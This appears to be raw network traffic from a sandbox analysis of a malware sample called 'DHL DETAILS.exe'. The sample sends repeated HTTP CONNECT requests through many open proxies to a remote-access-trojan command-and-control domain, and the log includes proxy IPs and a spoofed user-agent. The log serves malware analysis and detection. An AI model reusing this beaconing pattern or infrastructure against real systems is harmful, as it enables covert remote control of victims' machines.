                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    540192.168.2.551667162.243.102.20797646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.483212948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    541192.168.2.551551117.160.250.133806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.487720966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.676846981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.354566097 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    542192.168.2.551648174.64.199.8241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.496972084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    543192.168.2.55111446.101.186.238806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.497926950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.536472082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.724081993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.596018076 CET806INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Server: Apache/2.4.29 (Ubuntu)
                                                                                    Content-Length: 614
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    544192.168.2.55164972.195.114.16941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.500948906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    545192.168.2.551651174.77.111.19641456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.501164913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    546192.168.2.55165098.162.25.4316546352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.501554012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    547192.168.2.551274162.144.36.208382426352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.501600981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.536516905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.724078894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    548192.168.2.5510028.222.152.1585555543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.503675938 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    549192.168.2.551612101.133.175.25131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.505242109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.208107948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.333468914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.333462000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    550192.168.2.55165243.163.192.3156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.511521101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    551192.168.2.55121972.195.101.9941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.512712002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    552192.168.2.551603146.196.40.14688886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.521262884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.663285017 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    553192.168.2.55163060.246.122.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.531537056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    554192.168.2.551502117.160.250.16380816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.531702042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.290098906 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    555192.168.2.55163851.210.223.930006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.545613050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    556192.168.2.55170323.152.40.1431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.548211098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    557192.168.2.5506718.213.128.9066666352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.549530029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.859827995 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    558192.168.2.55115545.11.95.16660106352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.555102110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.567692995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.601697922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    559192.168.2.551742172.67.231.3806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.555108070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.709481955 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    560192.168.2.55163539.105.27.3031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.558789015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.072036982 CET38INHTTP/1.1 200 OK
                                                                                    content-length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    561192.168.2.55163947.243.205.131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.567019939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.900784969 CET59INHTTP/1.1 200 Connection Established
                                                                                    Proxy-agent: nginx


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    562192.168.2.551292154.12.253.232574476352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.569318056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.567693949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.601702929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    563192.168.2.551644185.158.114.14256976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.569343090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    564192.168.2.5516328.219.177.134156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.571589947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    565192.168.2.55166343.131.242.162156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.572094917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    566192.168.2.55125972.206.181.105649356352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.573458910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    567192.168.2.551621183.215.23.24290916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.576627016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.989536047 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    568192.168.2.55175845.14.174.148806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.577852011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.732079029 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
